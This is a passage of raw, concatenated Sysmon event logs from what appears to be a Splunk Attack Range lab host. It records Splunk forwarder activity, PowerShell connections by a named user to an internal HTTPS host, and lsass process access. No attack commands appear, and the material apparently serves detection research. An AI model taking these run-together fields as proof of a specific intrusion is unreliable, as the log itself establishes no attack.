Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.356{B81B27B7-8390-613A-D896-03000000C801}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.324{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FDA1E8788A7D6291B2C9F48415CBA06,SHA256=6EEACB57DE309A2C00373017974EB3933F1C0388810C79F44491EF3E0B989ABE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:04.908{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62159-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035128477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.760{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8391-613A-DA96-03000000C801}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.760{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.760{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.760{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.760{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.760{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8391-613A-DA96-03000000C801}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.760{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8391-613A-DA96-03000000C801}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.744{B81B27B7-8391-613A-DA96-03000000C801}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.392{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=068085C72EF958F4361ACFD74E97FBE0,SHA256=58719539679D43F6C94393C001E6512AFAC22C416B2000A50738463C396CB181,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.392{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6096E668DAAA3323A303802073E803F,SHA256=9D06F9D1C035762FD9D6884185F6494D6A841AAA5E51BE7EFB98EC81EE15A516,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.361{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F066226A919E35079C7B2CB0980A65,SHA256=76812CA9255697335681218241335757D6EE037B506DB58501953C184B4E5FC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.223{B81B27B7-8391-613A-D996-03000000C801}61563876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.060{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8391-613A-D996-03000000C801}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.060{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.060{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.060{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.060{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.060{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8391-613A-D996-03000000C801}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.060{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8391-613A-D996-03000000C801}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:41.040{B81B27B7-8391-613A-D996-03000000C801}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035128457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:05.376{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62160-false10.0.1.12-8000- 23542300x800000000000000035128479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:42.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=068085C72EF958F4361ACFD74E97FBE0,SHA256=58719539679D43F6C94393C001E6512AFAC22C416B2000A50738463C396CB181,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:42.422{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60DBB671339408CA08506E9FF551E2E3,SHA256=5EF5D3E81AAA1E9C2F8CB610C97833EC89F4FA3926AEBAF43FF5974715281F1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:43.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A6D7FF1E9765A145692E9CF6325FAEDE,SHA256=0A023CBE66FDAF0E294AE08EF33C405D5A18F6D939692EC1E442124B9409F0F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:43.437{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB1CD28C7219564505349013760615C2,SHA256=B0A498FA4693F5C9DCF17BAEF27CE3969DC3E595FA3FFC7887847249F6F4D675,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:44.458{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E4389334F40CABC965855182BA4DAB0,SHA256=716E91709714646AC85F793DE6E02AA8807BC96A95CF675649A78A9547D645ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:08.920{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62161-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:45.505{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84D81C5A8CCE48462639EA8AD98EDD6C,SHA256=BB36B1FC012B6A052C04032460D3ABF176922519D7A65C3B69F23EE5CEF3C091,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:46.520{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A8F3D8C7609EE4ADB98DBBE72BED585,SHA256=815F5B34CC3101B0D71D8932CAAF24773849BAC64027A53DA490E59B556078C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.418{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62162-false10.0.1.12-8000- 734700x800000000000000035128512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.934{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035128511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:47.918{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 